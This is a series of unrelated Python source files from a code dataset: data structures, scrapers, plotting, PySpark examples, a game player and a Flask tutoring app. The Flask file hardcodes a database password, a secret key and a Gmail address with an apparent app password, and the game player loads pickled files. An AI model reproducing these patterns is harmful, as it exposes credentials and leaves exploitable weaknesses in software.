find_max(self):\n \"\"\"Return (k, v) pair with maximum key (or None if empty).\"\"\"\n if len(self._table) > 0:\n return (self._table[-1]._key, self._table[-1]._value)\n else:\n return None\n\n def find_ge(self, k):\n \"\"\"Return (k, v) pair with least key >= k.\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j < len(self._table):\n return (self._table[j]._key, self._table[j]._value)\n else:\n return None\n\n def find_lt(self, k):\n \"\"\"Return (k, v) pair with greatest key < k.\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j > 0:\n return (self._table[j-1]._key, self._table[j-1]._value)\n else:\n return None\n\n def find_gt(self, k):\n \"\"\"Return (k, v) pair with least key > k.\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j < len(self._table) and self._table[j]._key == k:\n j += 1 # advance past match\n if j < len(self._table):\n return (self._table[j]._key, self._table[j]._value)\n else:\n return None\n\n def find_le(self, k):\n \"\"\"Return (k, v) pair with greatest key <= k.\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if (j < len(self._table) and self._table[j]._key != k)\\\n or j == len(self._table):\n j -= 1\n if j >= 0:\n return (self._table[j]._key, self._table[j]._value)\n else:\n return None\n\n def find_range(self, start, stop):\n \"\"\"Iterate all (k, v) pairs such that start <= key < stop\n\n If start is None, iteration begins with minimum key of map.\n If stop is None, iteration continues through the maximum key of map.\n \"\"\"\n if start is None:\n j = 0\n else:\n j = self._find_index(start, 0, len(self._table) - 1)\n while j < len(self._table) and (stop is None or \\\n self._table[j]._key < stop):\n yield (self._table[j]._key, self._table[j]._value)\n j += 1\n","repo_name":"storypku/tlpi","sub_path":"Data.Structures.and.Algorithms.in.Python/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":11010,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"25541182290","text":"#!/usr/bin/python3\n\nimport glob\nimport os\n#get the hpp_files\nfiles = glob.glob('src/**/*.hpp', recursive=True)\n\nmodified_files = []\nfor file in files:\n with open(file, \"r+\") as f: \n filename = os.path.basename(file).split(\".\")[0]\n old = f.read()\n f.seek(0)\n first_line = f.readline()\n if filename in first_line and '#ifndef' in first_line:\n continue\n modified_files.append(file)\n filename = \"__\" + filename + \"__\"\n f.seek(0)\n first_line = \"#ifndef \" + filename + \"\\n\" 
+ \"#define \" + filename + \"\\n\"\n last_line = \"\\n#endif\"\n f.write(first_line + old + last_line)\n\nif modified_files:\n print(\"modified the following files:\", modified_files)\nelse:\n print(\"no files modified\")\n ","repo_name":"isaac-castillo/rpg2","sub_path":"scripts/add_headers.py","file_name":"add_headers.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22526243737","text":"'''\nFind the nth root of value x.\n'''\n\nclass Prob:\n '''\n Using binary search.\n Time complexity: O(log_2(x)), since the binary search searches initially using [0,x]\n Space complexity: O(1), since the med variable just stores the median after each iteration.\n '''\n @staticmethod\n def nthRoot(n, x):\n lo = 0\n hi = x\n acc = 0.000000001 # accuracy of calculation\n med = hi/2\n while abs(med**n - x) > acc:\n # print(f\"med: {med}, med^n: {med**n}\")\n if med**n > x:\n hi = med\n else:\n lo = med\n med = (lo + hi)/2\n return med\n \n @staticmethod\n def test1(alg):\n n = 3 # root\n # x = 1000\n x = 27\n r = alg(n, x)\n print(\"r: \", r)\n\nalg = Prob.nthRoot\nProb.test1(alg)","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/nth_root.py","file_name":"nth_root.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"25615165359","text":"import discord\nfrom discord.ext import commands\nfrom discord.utils import get\n\nclass c153(commands.Cog, name=\"c132\"):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n @commands.command(name='Living_Bullet', aliases=['c153'])\n async def example_embed(self, ctx):\n embed = discord.Embed(title='Living Bullet',\n color=0xFDE68A)\n embed.set_thumbnail(url='https://www.duelingbook.com/images/custom-pics/2300000/2336244.jpg')\n\n embed.add_field(name='Status (Archetype)', value='Casual:3/Tournament:3', inline=True)\n embed.add_field(name='Type (Attribute)', value='Machine/Normal (EARTH)', inline=False)\n embed.add_field(name='Level (ATK/DEF)', value='7 (2850/2000)', inline=False)\n embed.add_field(name='Lore Text', value='With nothing in its path, this bullet is always known to find its mark. 
People try to capture and control this bullet, but no man, beast or entity has yet been able to tame the Living Bullet.', inline=False)\n        embed.set_footer(text='Set Code: ANCF')\n\n        await ctx.send(embed=embed)\n\ndef setup(bot: commands.Bot):\n    bot.add_cog(c153(bot))","repo_name":"ProfessorSean/Kasutamaiza","sub_path":"upcfcardsearch/c153.py","file_name":"c153.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34715793129","text":"import requests\nimport re\nimport json\nfrom os.path import exists\n\n\n# fetch a web page\ndef get_url(url):\n    \"\"\"\n    Fetch the page content; takes the URL.\n    \"\"\"\n    headers = {\n        'User-agent':\n        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'\n    }\n    response = requests.get(url, headers=headers)\n    if response.status_code == 200:\n        return response.text\n    else:\n        return None\n\n\ndef write_into_txt(txt):\n    \"\"\"\n    Save the data; takes the fetched page content.\n    \"\"\"\n    with open('E:\\\\computer\\\\Python\\\\programs\\\\爬虫\\\\猫眼爬虫\\\\test.txt',\n              'a',\n              encoding='utf-8') as file:\n        file.write(txt)\n\n\ndef read_txt(file_name):\n    \"\"\"\n    Read the data back; takes the file path.\n    \"\"\"\n    if exists(file_name):\n        print(\"> crawler file exists\")\n        with open(file_name, 'r', encoding='utf-8') as file:\n            content = file.read()\n            return content\n    return 0\n\n\n# extract the data\ndef parser_text(html):\n    \"\"\"\n    Extract the fields with a regular expression\n    and store them as dict records;\n    takes the page text that was read back\n    \"\"\"\n    pattern = re.compile(\n        r'<dd>.*?board-index.*?>(.*?)</i>.*?data-src=\"(.*?)\".*?name.*?>(.*?)</a>.*?class=\"star\">(.*?)</p>.*?class=\"releasetime\">上映时间:(.*?)</p>.*?class=\"integer\">(.*?)</i>.*?class=\"fraction\">(.*?)</i>.*?</dd>',\n        re.S)\n    items = re.findall(pattern, html)\n    for item in items:\n        dic = {\n            '排名': item[0],\n            '图片': item[1],\n            '电影名称': item[2].strip(),\n            '主演': item[3].strip()[3:],\n            '上映时间': item[4].strip()[:10],\n            '评分': item[5] + item[6]\n        }\n        print(dic)\n        # append the record to the result file\n        book_list = json.dumps(dic, ensure_ascii=False)\n        path = 'E:\\\\computer\\\\Python\\\\programs\\\\爬虫\\\\猫眼爬虫\\\\result.txt'\n        with open(path, 'a', encoding='utf-8') as file:\n            file.write(book_list + \"\\n\")\n        if exists(path):\n            print(f\"> results saved to {path}\")\n\n\n# main function\ndef main():\n    \"\"\"\n    Program entry point\n    \"\"\"\n    for a in range(5):\n        num = a * 10\n        url = f\"https://maoyan.com/board/4?offset={num}\"\n        html = get_url(url)\n        write_into_txt(html)\n    file = 'E:\\\\computer\\\\Python\\\\programs\\\\爬虫\\\\猫眼爬虫\\\\test.txt'\n    html_read = read_txt(file)\n    # print(html_read)\n    dic = parser_text(html_read)\n    print(dic)\n    # create_txt(dic)\n    # write_into_txt(dic)\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"LemonGuai/spider","sub_path":"猫眼爬虫/maoyan_Top10.py","file_name":"maoyan_Top10.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28505750744","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[8]:\n\n\nimport csv\n\n\n# In[9]:\n\n\nwith open('finished-paths-no-back.csv', newline='') as f:\n    reader = csv.reader(f)\n    fpnb = list(reader)\nf.close()\n\n\n# In[10]:\n\n\nwith open('finished-paths-back.csv', newline='') as f:\n    reader = csv.reader(f)\n    fpb = list(reader)\nf.close()\n\n\n# In[11]:\n\n\n\n\nresult1=list()\nfor i in range(1,13):\n    result1.append(0)\n    \n    \ntotal1=0\n\nfor i in fpnb:\n    diff=int(i[0])-int(i[1])\n    if diff>10:\n        result1[11]=result1[11]+1\n    else:\n        result1[diff]=result1[diff]+1\n    total1=total1+1\n    \n#print(total1) \nfor i in range(0,12):\n    result1[i]=(result1[i]*100)/total1\n    \n    \nresult1=[result1]\n#print(result1)\n\n\n# In[12]:\n\n\nfile = open('percentage-paths-no-back.csv', 'w+', newline ='') \nwith file: \n    write = csv.writer(file) \n    write.writerows(result1) \nfile.close()\n\n\n# In[13]:\n\n\nresult2=list()\nfor i in range(1,13):\n    result2.append(0)\n    \n    \ntotal2=0 \n\nfor i in fpb:\n    diff=int(i[0])-int(i[1])\n    if diff>10:\n        result2[11]=result2[11]+1\n    else:\n        result2[diff]=result2[diff]+1\n    total2=total2+1\n    \n#print(total2) \nfor i in range(0,12):\n    result2[i]=(result2[i]*100)/total2\n\nresult2=[result2]\n#print(result2)\n\n\n# In[7]:\n\n\nfile = open('percentage-paths-back.csv', 'w+', newline ='') \nwith file: \n    write = csv.writer(file) \n    write.writerows(result2) \nfile.close()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"debanjanchatterjee/CS685-data-mining","sub_path":"Assignment 2/percentage-paths-generator.py","file_name":"percentage-paths-generator.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72959723308","text":"import sys\nfrom collections import deque\n\nsys.stdin = open(\"input.txt\", \"rt\")\n\n# Problem 7. 
Curriculum Design\n\n# My solution\n'''\nessential = [x for x in input()]\nn = int(input())\nsubjects = [input() for _ in range(n)]\n\nfor i in range(n):\n    tmp = []\n    for x in subjects[i]:\n        if essential.__contains__(x) and not tmp.__contains__(x):\n            tmp.append(x)\n        else:\n            if tmp == essential:\n                print(\"#%d YES\" % (i + 1))\n            else:\n                print(\"#%d NO\" % (i + 1))\n'''\n\n# Model answer\nneed = input()\nn = int(input())\nfor i in range(n):\n    plan = input()  # the submitted course plan\n    dq = deque(need)  # turn the required course string into a deque\n    for x in plan:\n        if x in dq:  # if x is one of the required courses\n            if x != dq.popleft():  # if the value popped from the left differs from x, the order is wrong\n                print(\"#%d NO\" % (i + 1))\n                break\n    else:\n        if len(dq) == 0:  # YES if the deque is empty, otherwise NO\n            print(\"#%d YES\" % (i + 1))\n        else:\n            print(\"#%d NO\" % (i + 1))\n\n\n","repo_name":"bansakdo/Algorithm","sub_path":"inflean/Section5/Question07.py","file_name":"Question07.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17737538089","text":"import os\nimport sys\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as pltckr\nimport numpy as np\nfrom statistics import mean\n\nfrom common import DictObject, PresArgParser\n# ------------------------------------------------------------------------------\nclass ArgParser(PresArgParser):\n    # --------------------------------------------------------------------------\n    def __init__(self, **kw):\n        PresArgParser.__init__(self, **kw)\n\n        self._add_multi_input_arg()\n# ------------------------------------------------------------------------------\ndef make_argparser():\n    return ArgParser(prog=os.path.basename(__file__))\n# ------------------------------------------------------------------------------\ndef _format_time(s, pos=None):\n    if s >= 3600:\n        h = int(s/3600)\n        s -= h*3600\n        m = int(s/60)\n        s -= m*60\n        return \"%2d:%02d:%02d\" % (h, m, s)\n\n    m = int(s/60)\n    s -= m*60\n    return \"%2d:%02d\" % (m, s)\n# ------------------------------------------------------------------------------\ndef do_plot(options):\n\n    labels = {\n        0: \"compiler\\nclang-tidy\",\n        1: \"ccache\\nclang-tidy\",\n        2: \"compiler\\nctcache\",\n        3: \"ccache\\nctcache\"\n    }\n    data = {}\n    x_interval = 0.0\n\n    for input_path in options.input_path:\n        measured = DictObject.loadJson(input_path)\n        key = (1 if measured.ccache else 0) + (2 if measured.ctcache else 0)\n        try:\n            dk = data[key]\n        except KeyError:\n            dk = data[key] = {\n                \"label\": labels[key],\n                \"age\": [],\n                \"load\": []\n            } \n        for row in measured.data:\n            x_interval = max(x_interval, row.age)\n            dk[\"age\"].append(row.age)\n            dk[\"load\"].append(row.cpu_load_5)\n\n    tick_opts = [5,10,15,30,60]\n    for t in tick_opts:\n        x_tick_maj = t*60\n        if x_interval / x_tick_maj < 12:\n            break\n\n    plt.style.use('dark_background')\n    fig, spl = plt.subplots()\n    options.initialize(plt, fig)\n\n    for k, dk in data.items():\n        x = dk[\"age\"]\n        y = dk[\"load\"]\n        spl.plot(\n            x, y,\n            label=dk[\"label\"],\n            linewidth=2,\n            color=options.color_from_to(k, 0, 3)\n        )\n    \n    spl.xaxis.set_major_locator(pltckr.MultipleLocator(x_tick_maj))\n    spl.xaxis.set_major_formatter(pltckr.FuncFormatter(_format_time))\n    spl.set_xlabel(\"Build time\")\n    spl.set_ylabel(\"CPU load\")\n    spl.grid(axis=\"both\", alpha=0.25)\n    spl.legend()\n\n    options.finalize(plt)\n# ------------------------------------------------------------------------------\ndef main():\n    do_plot(make_argparser().make_options())\n    return 0\n# ------------------------------------------------------------------------------\nif __name__ == 
\"__main__\":\n exit(main())\n# ------------------------------------------------------------------------------\n","repo_name":"matus-chochlik/ctcache","sub_path":"doc/latex/tools/plot-system-load.py","file_name":"plot-system-load.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"37"} +{"seq_id":"34806198808","text":"import car_manager\n\nFONT = (\"Courier\", 24, \"normal\")\nfrom turtle import Turtle\nfrom car_manager import CarManager\nclass Scoreboard(Turtle):\n def __init__(self):\n super().__init__()\n self.score = 0\n self.penup()\n self.hideturtle()\n self.goto(-50, 250)\n self.display_score()\n def increment_score(self):\n self.score+=1\n self.display_score()\n\n def display_score(self):\n self.clear()\n self.write(f\"Score: {self.score}\", move=False, align='left', font=FONT)\n\n def game_over(self):\n self.goto(-150,0)\n self.write(\"Game Over\", move=False, align='left', font = (\"Courier\", 40, \"bold\"))\n","repo_name":"Aizad-eng/Turtle-crossing-game","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69979144747","text":"def string_correct(text:str)->str:\r\n text_l = list(text)\r\n text_l[0] = text_l[0].capitalize()\r\n if(text[len(text)-1]!='.'):\r\n text_l.append('.')\r\n text = ''.join(text_l)\r\n # if()\r\n # print(text)\r\n # print(text[0])\r\n # print(text[len(text)-1])\r\n\r\nstring_correct(\"lethanhtuan\")","repo_name":"cheaterdxd/my-coding-memory","sub_path":"python-practice-/string_fixed.py","file_name":"string_fixed.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39444463584","text":"from loguru import logger\nfrom pydantic import BaseSettings\n\n\nclass Settings(BaseSettings):\n TG_API_ID: str = None\n TG_API_HASH: str = None\n TYPING_SYMBOL: str = \"▒\"\n TYPING_PAUSE_INTERVAL: float = 0.05\n TYPING_SYMBOL_INTERVAL: float = 0.02\n FLOOD_WAIT_INTERVAL: float = 0.05\n JOKE_CHOICE_INTERVAL: float = 1.0\n\n\ndef get_settings() -> Settings:\n settings = Settings()\n _check_settings(settings)\n\n return Settings()\n\n\ndef _check_settings(settings: Settings) -> None:\n logger.debug(\"Проверяем настройки\")\n\n if not settings.TG_API_ID:\n print(\"Укажите api_id в переменной окружения TG_API_ID\")\n exit(1)\n logger.debug(\"TG_API_ID указан\")\n\n if not settings.TG_API_HASH:\n print(\"Укажите api_hash в переменной окружения TG_API_HASH\")\n exit(1)\n logger.debug(\"TG_API_HASH указан\")\n\n logger.debug(\"Настройки заданы корректно\")\n","repo_name":"StanislavBeskaev/UserBotTelegram","sub_path":"app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"188836286","text":"# #### Saving PySpark DataFrames\n# Once you’ve done some analysis, the next step is often saving the transformed data back to disk for others to use. In this final topic, we’re going to cover how to efficiently save PySpark DataFrames.\n# \n# Similar to the SparkSession.read() method, Spark offers a SparkSession.write() method. Let’s perform a slight modification to our original Wikipedia views dataset and save it to disk. 
This code just uses .select() to select all columns except the monthly_count column (recall that earlier we discovered this column only contains zeros).\n# \n# Because Spark runs all operations in parallel, it’s typical to write DataFrames to a directory of files rather than a single CSV file. In the example below, Spark will split the underlying dataset and write multiple CSV files to cleaned/csv/views_2022_01_01_000000/. We can also use the mode argument of the .csv() method to overwrite any existing data in the target directory.\n# \n# hrly_views_df\\\n# .select(['language_code', 'article_title', 'hourly_count'])\\\n# .write.csv('cleaned/csv/views_2022_01_01_000000/', mode=\"overwrite\")\n# Using SparkSession.read(), we can read the data from disk and confirm that it looks the same as the DataFrame we saved.\n# \n# ##### Read DataFrame back from disk\n# hrly_views_df_restored = spark.read\\\n# .csv('cleaned/csv/views_2022_01_01_000000/')\n# hrly_views_df_restored.printSchema()\n# root\n# |-- _c0: string (nullable = true)\n# |-- _c1: string (nullable = true)\n# |-- _c2: string (nullable = true)\n# Close, but not quite! It looks like this file didn’t retain information about column headers or datatypes. Unfortunately, there’s no way for a CSV to retain information about its format. Each time we read it, we’ll need to tell Spark exactly how it must be processed.\n# \n# Luckily, there is a file format called “Parquet” that’s specially designed for big data and solves this problem among many others. Parquet offers efficient data compression, is faster to perform analysis on than CSV, and preserves information about a dataset’s schema. Let’s try saving and re-reading this file to and from Parquet instead.\n# \n# ##### Write DataFrame to Parquet\n# hrly_views_slim_df\n# .write.parquet('cleaned/parquet/views_2022_01_01_000000/', mode=\"overwrite\")\n# \n# ##### Read Parquet as DataFrame\n# hrly_views_df_restored = spark.read\\\n# .parquet('cleaned/parquet/views_2022_01_01_000000/')\n# \n# ##### Check DataFrame's schema\n# hrly_views_df_restored.printSchema()\n# root\n# |-- language_code: string (nullable = true)\n# |-- article_title: string (nullable = true)\n# |-- hourly_count: integer (nullable = true)\n# Great, now anyone who wants to query this data can do so with the much more efficient Parquet data format!\n\n\nfrom pyspark.sql import SparkSession\n\n# Create a new SparkSession\nspark = SparkSession\\\n .builder\\\n .config('spark.app.name', 'learning_spark_sql')\\\n .getOrCreate()\n\n# Read in Wikipedia Unique Visitors Dataset\nwiki_uniq_df = spark.read\\\n .option('header', True) \\\n .option('delimiter', ',') \\\n .option('inferSchema', True) \\\n .csv(\"wiki_uniq_march_2022.csv\")\n\n# Run the code to create a new DataFrame with only domain and uniq_human_visitors.\n# select only domain and uniq_human visitors\nuniq_human_visitors_df = wiki_uniq_df\\\n .select('domain', 'uniq_human_visitors')\n\n# show the new DataFrame\nuniq_human_visitors_df.show()\n\"\"\"\n\n+------------------+-------------------+\n| domain|uniq_human_visitors|\n+------------------+-------------------+\n|en.m.wikipedia.org| 33261399|\n| en.wikipedia.org| 17009339|\n|es.m.wikipedia.org| 5668575|\n|ru.m.wikipedia.org| 5816762|\n|ja.m.wikipedia.org| 5396108|\n|de.m.wikipedia.org| 4439596|\n|fr.m.wikipedia.org| 3798528|\n| ru.wikipedia.org| 2852296|\n| es.wikipedia.org| 2460489|\n|it.m.wikipedia.org| 2806943|\n| de.wikipedia.org| 2252670|\n| ja.wikipedia.org| 2128471|\n| fr.wikipedia.org| 
1839196|\n|zh.m.wikipedia.org| 2123391|\n|ar.m.wikipedia.org| 1644253|\n|pt.m.wikipedia.org| 1471752|\n|pl.m.wikipedia.org| 1410339|\n|fa.m.wikipedia.org| 1194940|\n| zh.wikipedia.org| 1088755|\n|tr.m.wikipedia.org| 908573|\n+------------------+-------------------+\nonly showing top 20 rows\"\"\"\n\n# Save the new DataFrame as CSV files.\nuniq_human_visitors_df\\\n .write.csv('./results/csv/uniq_human_visitors/', mode=\"overwrite\")\n\n# Save the new DataFrame as Parquet files.\nuniq_human_visitors_df\\\n .write.parquet('./results/pq/uniq_human_visitors/', mode=\"overwrite\")","repo_name":"muyiwao/PySparkPractises","sub_path":"CodeAcademyPractise/13_Saving_PySpark_DF.py","file_name":"13_Saving_PySpark_DF.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8921130425","text":"from core import *\nfrom .Memory import Memory\n\nclass HAL1Player(Player):\n \"\"\"\n Subclass of Player, a first try at a learning player.\n\n Attributes\n ----------\n memories: Memory\n Advanced dictionary that registers the past games.\n saveGame: bool\n Indicates if the game must be saved or not (True by default, set to False if the game is known).\n nbOfIntelligentGame: int\n The number of games where the memory has been used.\n evolutionOfMemories: list of int\n The lengths of the memory, one entry added at the end of each game.\n \"\"\"\n def __init__(self, game, board):\n super().__init__(game, board)\n self.memories = Memory()\n self.saveGame = True\n self.nbOfIntelligentGame = 0 # used for statistics purposes\n self.evolutionOfMemories = [] # used to record the evolution of the length of the memories' dict\n\n def play(self):\n \"\"\"\n Plays a first random movement and then tries to play intelligently\n\n Intelligently means it recognises the learned boardStates that lead to direct victory (in one movement)\n and plays the winning movement --- not so intelligent, but self-learning!\n \"\"\"\n # random movement for the first turn\n if self.game.turn <= 2:\n self.randomPlay()\n if self.game.interactionLevel.showPlayerDebug:\n print(\"HAL1: beginning random\")\n\n # if the boardState is known, the winning movement is played\n elif self.game.boardAR.boardS in self.memories.pastGames:\n place = self.memories.pastGames[self.game.boardAR.boardS]\n mvt = Movement(self, place)\n self.boardAR.play(mvt)\n\n if self.game.interactionLevel.showPlayerDebug:\n print(\"HAL1: intelligent !\")\n\n self.nbOfIntelligentGame += 1\n self.saveGame = False\n # else a random movement is played\n else:\n if self.game.interactionLevel.showPlayerDebug:\n print(\"HAL1: not the beginning but random !\")\n self.randomPlay()\n\n def endOfGame(self):\n \"\"\"\n Record the game if it is not an already known game\n\n This function is called when a game is over, it relies on self.saveGame to know if the game must be learnt\n or not. 
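 (Illustrative sketch, restating the lookup that play() performs above, under the assumption that Memory.pastGames maps a board state to the movement that won from it:

 if self.game.boardAR.boardS in self.memories.pastGames:
 place = self.memories.pastGames[self.game.boardAR.boardS]
 self.boardAR.play(Movement(self, place))
 )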
If it is the case, memories.addGame(game) is called.\n Reset self.saveGame to True at the end.\n Manages self.evolutionOfMemories\n \"\"\"\n # calls the parent's method (that registers the statistics)\n super(HAL1Player, self).endOfGame()\n\n # print info if wanted\n if self.game.interactionLevel.showPlayerDebug:\n print(\"HAL1: EOG, saveGame:\", self.saveGame)\n\n # if the game is not known (saveGame == True) and is not a draw (winner != None)\n # the game is learnt\n if self.saveGame and self.game.winner is not None:\n self.memories.addGame(self.game)\n\n # reset of self.saveGame (must not be forgotten !)\n self.saveGame = True\n\n # Add the length of the memory\n self.evolutionOfMemories.append(len(self.memories.pastGames))\n\n def openTraining(self, trainingFileName):\n \"\"\" Imports a trained memories dictionary \"\"\"\n import pickle\n with open(trainingFileName, 'rb') as f:\n self.memories.pastGames = pickle.load(f)\n\n def saveTraining(self, trainingFileName):\n \"\"\" Saves a trained memories dictionary \"\"\"\n import pickle\n # write to the file name given by the caller\n with open(trainingFileName, 'wb') as f:\n pickle.dump(self.memories.pastGames, f, pickle.HIGHEST_PROTOCOL)\n\n\nif __name__ == '__main__':\n print([[] for i in range(10)])\n","repo_name":"deterralba/tictactoe","sub_path":"source/players/HAL1Player.py","file_name":"HAL1Player.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29467891023","text":"from flask import Flask\nfrom flask import render_template, Response, request, session\nfrom datetime import timedelta\nfrom flaskext.mysql import MySQL\nfrom werkzeug.utils import redirect\nfrom functools import wraps\nfrom flask_mail import Mail, Message\nfrom io import TextIOWrapper\nimport secrets\nimport io\nimport xlwt\nimport re\nimport queue\nimport random\nimport csv\n\n\napp = Flask(__name__)\n# With os: os.urandom(24)\napp.config['SECRET_KEY'] = 'secret-key:)'\nmysql = MySQL()\napp.config['MYSQL_DATABASE_HOST']='localhost'\napp.config['MYSQL_DATABASE_USER']='root'\napp.config['MYSQL_DATABASE_PASSWORD']='Password123*'\napp.config['MYSQL_DATABASE_DB']='tutorias'\nmysql.init_app(app)\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'holasoysolarelbot@gmail.com'\napp.config['MAIL_PASSWORD'] = 'zyyywjwgqtbbtswm'\napp.config['MAIL_USE_SSL'] = True\nmail = Mail(app)\nq = queue.Queue()\n\n\nanswers = [\n \"¡Por supuesto!😄\\n\",\n \"Of course!🤪\\n\",\n \"E-N S-E-G-U-I-D-A...🤖\\n\",\n \"'Yes' en Inglés 🧾(Jobs😉)\\n\",\n \"I'm coming!👀\\n\",\n \"¡Claro!🤓\\n\",\n \"🧐¡Enseguida!\\n\",\n \"Buscando...🔍\\t ¡Aquí está!🤓\\n\",\n \"Searching...🔍\\t Check it out!🤓\\n\",\n]\n\n\nwithout_answers = [\n \"No tengo esa información😰\\n\",\n \"No lo encuentro en mi base de datos😱\\n\",\n \"🤨I don't understand you\\n\",\n \"Hmmm, I don't know😧\\n You could send your question below📫\",\n \"No entiendo😖\\n Puedes mandar correo con tu pregunta y pronto estará aquí🤓\",\n \"Uy, no tengo respuesta para ello😶\\n ¡Sugiere la pregunta aquí abajo!👇\",\n \"No cuento con esa información😓\\n Si quieres ver tu respuesta, ¡Sugiere una pregunta!🤓\",\n \"No te lo vengo manejando, joven🤠\\n ¡Deberías sugerir la pregunta!\",\n]\n\ndef admin_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'pwd' in session:\n return f(*args, **kwargs)\n else:\n return render_template('handling/error/expired-session.html')\n return wrap\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, 
**kwargs):\n if 'studentCode' in session:\n return f(*args, **kwargs)\n else:\n return render_template('handling/error/expired-session.html')\n return wrap\n\n\n@app.route('/solar')\n@app.route('/chatbot')\n@login_required\ndef index():\n return render_template('student/index.html')\n\n@app.route('/login')\ndef login():\n return render_template('student/login.html')\n\n@app.route('/keywords')\n@login_required\ndef keywords():\n return render_template('student/keywords.html')\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n@app.route('/select')\ndef select():\n return render_template('select.html')\n\n@app.route('/suggest')\n@login_required\ndef suggest():\n return render_template('student/suggest.html')\n\n@app.route('/master-login')\ndef master_login():\n return render_template('tutor/login.html')\n\n@app.route('/new-question')\n@admin_required\ndef new_question():\n return render_template('tutor/new-question.html')\n\n@app.route('/new-student')\n@admin_required\ndef new_student():\n return render_template('tutor/new-student.html')\n\n@app.route('/new-tutor')\n@admin_required\ndef new_tutor():\n return render_template('tutor/new-tutor.html')\n\n\n@app.route('/upload-questions')\n@admin_required\ndef upload():\n return render_template('tutor/upload-questions.html')\n\n@app.route('/updated')\ndef updated():\n return render_template('handling/sucess/updated.html')\n\n@app.route('/created')\ndef created():\n return render_template('handling/sucess/created.html')\n\n@app.route('/error-update')\ndef error_update():\n return render_template('handling/error/error-update.html')\n\n@app.route('/error-save')\ndef error_save():\n return render_template('handling/error/error-save.html')\n\n\n\n#Handling Errors\n\n@app.errorhandler(400)\ndef handle_bad_request(e):\n return render_template('handling/error/error-400.html'), 400\n\n@app.errorhandler(403)\ndef handle_bad_request(e):\n return render_template('handling/error/error-400.html'), 403\n\n@app.errorhandler(404)\ndef not_found(self):\n return render_template('handling/error/error-404.html'), 404\n\n@app.errorhandler(500)\ndef internal_error(error):\n return render_template('handling/error/error-500.html'), 500\n\n@app.errorhandler(405)\ndef method_not_found(error):\n return render_template('handling/error/error-405.html'), 405\n\n@app.route('/error-500')\ndef error_500():\n return render_template('handling/error/error-500.html')\n\n@app.route('/error-405')\ndef error_405():\n return render_template('handling/error/error-405.html')\n\n@app.route('/error-400')\ndef error_400():\n return render_template('handling/error/error-400.html')\n''''\n@app.route('/error-form')\ndef error_form():\n return render_template('handling/error/error-form.html')\n'''\n\n@app.route('/download/report/excel/tutor-and-student')\ndef download_report():\n sql = \"SELECT tutores.id_tutor, tutores.nombre, tutores.correo,carreras.id_carrera, carreras.nombre AS carrera, alumnos.id_alumno, alumnos.nombre AS alumnos FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera INNER JOIN tutores ON alumnos.id_tutor = tutores.id_tutor\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n\n #output in bytes\n output = io.BytesIO()\n #create WorkBook object\n workbook = xlwt.Workbook()\n #add a sheet\n sh = workbook.add_sheet('Tutor and Student Report')\n\n #add headers\n sh.write(0, 0, 'Id del Tutor')\n sh.write(0, 1, 'Nombre del tutor')\n sh.write(0, 2, 'Correo 
